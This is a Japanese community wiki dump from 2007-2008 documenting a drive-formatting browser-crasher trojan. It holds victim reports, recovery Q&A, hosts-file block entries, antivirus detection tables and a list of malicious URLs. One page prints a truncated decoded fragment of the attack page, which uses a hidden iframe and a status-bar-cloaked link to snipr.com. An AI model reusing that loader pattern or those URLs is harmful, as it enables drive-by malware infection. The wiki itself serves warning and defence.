HDDをフォーマットするブラクラ まとめwiki
http://w.atwiki.jp/burakura_hdd/
HDDをフォーマットするブラクラ まとめwiki
ja
2012-04-17T14:19:18+09:00
1334639958
-
a
https://w.atwiki.jp/burakura_hdd/pages/18.html
a
2012-04-17T14:19:18+09:00
1334639958
-
症状・被害状況
https://w.atwiki.jp/burakura_hdd/pages/17.html
*どのような被害が出ているのか、レスのコピペとか。
76 名前:名無しさん@八周年[] 投稿日:2007/12/31(月) 03:35:28 ID:KtLh+7aB0
いちおう人柱報告ね
XP+IE7+NIS2007
リンクをクリック→検証動画と同じようにことが運ぶ→OE起動してmixi?にmixi批判メールを送信しようとする→
Norton先生反応しないのでLAN引っこ抜く→クイックスキャン異常なし→再起動→
Yahoo!MessangerにID:AmiLaLaFlowerが追加→AmiLaLaFlower削除できず→セーフモードでスキャン異常なし→
オンラインスキャン実行→
↑
今ここ
Norton先生まったく反応せず、ログビューアに何もなし
323 名前: 偏屈男(神奈川県)[] 投稿日:2007/12/31(月) 03:12:18.91 ID:v8cHk4gK0
http://tmp7.2ch.net/test/read.cgi/download/1198981070/776
776 名前:[名無し]さん(bin+cue).rar[] 投稿日:2007/12/31(月) 03:11:54 ID:TaWNp3Ax0
しかしこれ思った以上にてごわい(´・ω・) ス
再起動するまでもなく、csrss.exeを書き換えて再常駐。
で2時間ほどでタイマー発動らしく自動で再起動しちゃう(´・ω・) ス
VM壊れた(´・ω・) ス
----
703 :名無しさん@八周年 [sage] :2007/12/31(月) 13:02:43 ID:3BvdahWY0
再起動してみたらavastの網にかかってた
クリックした覚えはないし
Live2ch+FireFoxなんだが
どっから入ったんだ
845 :703 [sage] :2007/12/31(月) 13:48:46 ID:dIHEM3wG0
>>809
とりあえずモチついてくれ。
このスレと前スレ拾ったあと再起動したらなんともなかった。
(トリつけないままLAN切ってしまったんでID変わってるはず orz)
ちなみにavastのログは
2007/12/31 4:37:10 Administrator 92
2008-01-01T16:08:33+09:00
1199171313
-
Q&A
https://w.atwiki.jp/burakura_hdd/pages/16.html
''※問題の無い内容を何度も消す行為は悪質な荒らし行為になります'' プロバイダへの通報も考えますのでお控えください 言いたい事があるなら消さずに掲示板に書いてください。
ちなみに、愉快犯的にウイルスのURLを貼る行為も罰せられる可能性があります。
*Q. URLを開いてしまったけど大丈夫?
A. エロ画像が表示されただけなら大丈夫 ※クリックするとウイルス&ブラクラページへ移動する
ブラクラが発動しただけの場合、多分大丈夫
''※必ずスタートメニューの「スタートアップ」に変な物が無いか確認してください'' 何も無ければ大丈夫…の筈。さらに心配ならウイルススキャン+スタートアップの元ファイルを辿って
*Q. メールが送られてきた 怖い
A. ブラクラがメール編集画面を開いているだけです 貴方のメールアドレスは漏れていません
*Q. Macだけど大丈夫?
A. TR/Delwin というウイルス名からして恐らくWindowsでしか動作しないウイルス 多分大丈夫
*Q. 消えたファイルを復旧させたい
A. ホワイター(ファイルを消してしまうウイルス)の動作によっては、一部ファイルが救出可能かも知れません。
- DataRecovery http://www.vector.co.jp/soft/win95/util/se382922.html 無料
- 復元 http://www.vector.co.jp/soft/win95/util/se410717.html サンプル版は無料、機能制限有り
- Vectorで検索 http://search.vector.co.jp/search?query=%95%9C%8C%B3
////犯人特定とかはWIKIに書かないほうが良いと思うんでコメントアウトしておきます。////////
// ↑理由が不明です
// ↑犯人ぶっころがしたいとか犯罪っぽい書き込みがあるから
// ↑アホかw お前訴えられたくない犯人じゃね?
//*Q. 犯人が誰なのか知りたい 犯人訴えたい
//A. 「はだしのゲン」公式?サイトのアップローダに、このブラクラへジャンプするファイルがアップロードされました。
//[[残念ながら、既にIPのログは流れてしまっている様子//>http:/
2012-09-16T15:23:25+09:00
1347776605
-
対策
https://w.atwiki.jp/burakura_hdd/pages/15.html
#contents()
*Windowsの初期ブラウザであるInternet Explorer(以下 IE )やIEエンジンのブラウザを使わず、geckoエンジンであるFirefoxや、独自エンジンであるOperaなどを使う。
根本的な対策としては、IEやスレイプニルなどで多分に使われているIEエンジンのブラウザを使わず、geckoエンジンであるFirefoxや非IEエンジンであるOperaなどを使う。
ファイアーウォールやhostsファイルなどで特定のURLにアクセスしないように設定しても、またコードが別のサイトに載り、踏んでしまえば手遅れな事態になりかねない。
ブラウザを変えるのが根本的な対策といえる。
被害が怖ければ、今回の問題の前ではIEエンジンは原則として危険、使用禁止と見るべき。
[Firefox] Mozilla Japan - Firefox
http://www.mozilla-japan.org/products/firefox/
[Opera] Opera
http://jp.opera.com/
*ブラクラを仕込むスクリプトがおいていあるcunt.multiservers.comにアクセスしないようにする
その1 PFWでcunt.multiservers.comをブロックする。
その2 \windows\system32\drivers\etc\hostsに
0.0.0.0 snipr.com
0.0.0.0 cunt.multiservers.com
と書く。
*Internet Explorer の設定を変更する
現在、スクリプトの本体は cunt.multiservers.com にあります。
cunt.multiservers.com は、Microsoft と Internet Explorer ユーザーを敵視しています。
その1 インターネットゾーン「拡張子ではなく、内容によってファイルを開く」を「無効」にする。
その2 cunt.multiservers.com を制限サイトに追加する。
*特定URLのアクセス先を変更する
これは忘れた頃に猛威を振るうウイルスです。
今後のためにも、以下の操作をしておきましょう。
**手順
C:\WINDO
2008-01-10T03:03:26+09:00
1199901806
-
有用と思われる書き込み
https://w.atwiki.jp/burakura_hdd/pages/14.html
みんな何かあったら抽出頼んだ。
*このページは見ただけでは感染しません。
&bold(){一部アンチウィルスソフト(特にノートン)が記述をウィルスと誤認する可能性があります。}
726 名前:以下、名無しにかわりましてVIPがお送りします。[sage] 投稿日:2007/12/31(月) 01:00:28.46 ID:ou5idN1m0
520 名前: ボーイッシュな女の子(兵庫県)[] 投稿日:2007/12/31(月) 00:53:12.21 ID:+qMRRISz0
暗号化されたデータをデコードしてみた。
しょうもないスクリプトだった。
<script type="text/javascript">
<div id="imgWrapper" style="z-index:2000;"><a id="lnk" href="http://snipr.com/wt_link01" oncontextmenu="try{location.replace('http://snipr.com/wt_link01');}
catch(e){};return false;" onmouseover="window.status=' ';return true;" onmouseout="window.status=' ';return true;" onfocus="window.status=' ';return true;"
onblur="window.status=' ';return true;" style="cursor:default;border:0px none;"><img id="wtImg" src="http://snipr.com/wt_imgsrc01" border="0"
style="border:0px none" alt=""></a></div>
<div id="iframeWrapper"><iframe id="wtIfm" name="wtIfm" src="http://snipr.com/wt_iframesrc01" style="visibility:hidden;width:1px;height:1px;border:0px none;"
framebor
2008-01-01T16:07:46+09:00
1199171266
-
各ブラウザ反応状況
https://w.atwiki.jp/burakura_hdd/pages/13.html
被害を受けるのはWindowsXPとそれ以前のWindowsのみです。
Vista及びMacOSXやLinuxでは被害を受けません。
|ブラウザ|被害有無|詳しい内容|h
|Internet Explorer6以前|有|Windows版のみ被害を受ける|
|Sleipnir|有(注1|レンダリングエンジンがGeckoならセーフ|
|その他IEコンポーネントブラウザ|有(注1|Donut、Lunascape等|
|Internet Explorer7|無|XP SP2-ファイル名をフルパスで指定してもパスは無視され、ファイル名と拡張子だけが対象になる。ダウンロードフォルダはユーザーが通常指定しているフォルダである。拡張子にbat,cmd,com,exe等、危険とされている拡張子が指定されている場合、ファイルの保存は実行されない(ダイアログが出ない)|
|Firefox|無|URLが表示されるだけ|
|Opera|無||
|Safari|無||
(注1 JavaScript[あれ?ActiveXもだったっけ?]実行が許可されていた場合のみ。Javaは関係ない。
各2chブラウザの画像ビューアで開いた場合の動作は、各ブラウザのスレなどを参照すること。
とりあえずJane系の画像インライン表示、画像ビューア、Live2chの画像プレビュー、画像ポップアップ、ギコナビの画像プレビューは安全。
ただし、すべての専用ブラウザにおいて言えることだが、クリックしてIEなどで開くと当然危険なので、専用ブラウザを使っているからと安心しきってしまってはいけない。
また、タブブラウザのようにブラウザ機能を内蔵している専用ブラウザの場合は、その内蔵ブラウザ機能で開くのも危険なので注意。
399 名前:名無しさん@八周年[] 投稿日:2007/12/31(月) 04:25:51 ID:mkBVb9YC0
2ちゃんねるブラウザのIEコンポについて
ttp://browser2ch.web.fc2.com/
各webブラウザのエンジンなどについて
ttp://ja.wikipedia.org/wiki/Template:%E3%82%A6%E3%82%A7%E3%83%96%E3%83%96%E3%83%A9%E3%82%A6%E3%82%B6
2008-01-01T05:06:26+09:00
1199131586
-
アンチウイルスソフト対応状況
https://w.atwiki.jp/burakura_hdd/pages/12.html
2008年1月17日 7:30頃の状況(空欄は状況不明)
|ソフト|対応○×|詳しい内容|
|AntiVir|○|検出名:TR/Dldr.Agent.aqr.20|
|BitDefender| ×|Virus Signatures 972843の定義ファイルでは未対応を確認済|
|ノートン|○|検出名:Downloader(パターンファイル 2008.01.03.053で確認)|
|ウィルスバスター|○|検出名:JS_DLOADER.ZX(パターンファイル Ver.4.933で確認)|
|マカフィー| ×|パターンファイル Ver.5209.0000(2008/01/16)では未対応を確認済|
|カスペルスキー|○|検出名:Trojan-Downloader.JS.Agent.aqr|
|ウイルスキラー|○|検出名:Trojan.DL.Script.JS.Agent.lyx(?)|
|Windows Live|○|検出名:TrojanDownloader:JS/Agent.JG(?)|
|Live one care|○|検出名:TrojanDownloader:JS/Agent.JG|
|ウイルスセキュリティーZERO|||
|avast!|○|検出名:VBS:Malware-gen(080125-2)|
|AVG|○|検出名:Trojan horse Small.2.BJ|
|キングソフト| ×|パターンファイル 2008.01.16.17では未対応を確認済(検出名:JS.IeFrameT.bx?)|
|NOD32| ×|パターンファイル Ver.2799(20080116)では未対応を確認済(検出名:BAT/DeltreeY.AN?)|
|F-Secure|○|検出名:Trojan-Downloader.JS.Agent.aqr|
|G DATA|○|検出名:Trojan-Downloader.HTML.Agent.ir|
|Panda|○|検出名:Trj/Agent.HQI(VirusTotalの結果による)|
|ソフォス|○|検出名:Troj/Iframe-N|
|CA|○|検出名:JS/Snz.A|
注記)×が付いているソフトでも、トロイがダウンロードするウイルスは検出可能と思われるが、トロイ自体はブロックできな
2009-06-07T13:42:54+09:00
1244349774
-
ブラクラ登録推奨
https://w.atwiki.jp/burakura_hdd/pages/11.html
*下記URLを踏むと大変危険です絶対にアクセスしないでください
//リンクになっているのは警告があっても危険なので実態参照に改変しました
711 名前:[名無し]さん(bin+cue).rar 投稿日:2007/12/31(月) 00:48:15 ID:aLuFT5uG0
絶対に踏むなよ?
この辺のurlがはいってるのがウィルス入りの可能性大
http://www.gigigi.net/up/img/1230.jpg
http://zz.tc/
http://b.u-tyan.net/url/
http://s-url.jp/
http://1stepup.com/url/
http://go.2ch2.net/
http://nyan33.com/a/
http://turl.biz/
http://www.j2url.com/
http://365.to/
http://web-page.utun.jp/
http://4url.in/
http://kds777.biz/url/
http://raus.de/crashme/
http://imepita.zz.tc/200712305489
基本
1230.jpg
1226.jpg
up06139.jpg
584 名前: うぐいす嬢(東京都)[] 投稿日:2007/12/31(月) 03:36:51.87 ID:h3sKSbjG0
短縮URLサービス43個、tp://が付いてないのはzz.tcと同じ理由
もっとあるから誰か追加してくれ、それと見づらくて御免
zz.tc 3w.to aim.to url.sh nihongourl.nu tp://b.u-tyan.net tp://s-url.jp
tp://1stepup.com tp://go.2ch2.net
2008-01-01T18:21:20+09:00
1199179280
-
プラグイン/コメント
https://w.atwiki.jp/burakura_hdd/pages/10.html
* コメントプラグイン
@wikiのwikiモードでは
#comment()
と入力することでコメントフォームを簡単に作成することができます。
詳しくはこちらをご覧ください。
=>http://atwiki.jp/guide/17_60_ja.html
-----
たとえば、#comment() と入力すると以下のように表示されます。
#comment
2007-12-31T01:07:45+09:00
1199030865
-
プラグイン/関連ブログ
https://w.atwiki.jp/burakura_hdd/pages/9.html
* 関連ブログ
@wikiのwikiモードでは
#bf(興味のある単語)
と入力することで、あるキーワードに関連するブログ一覧を表示することができます
詳しくはこちらをご覧ください。
=>http://atwiki.jp/guide/17_161_ja.html
-----
たとえば、#bf(ゲーム)と入力すると以下のように表示されます。
#bf(ゲーム)
2007-12-31T01:07:45+09:00
1199030865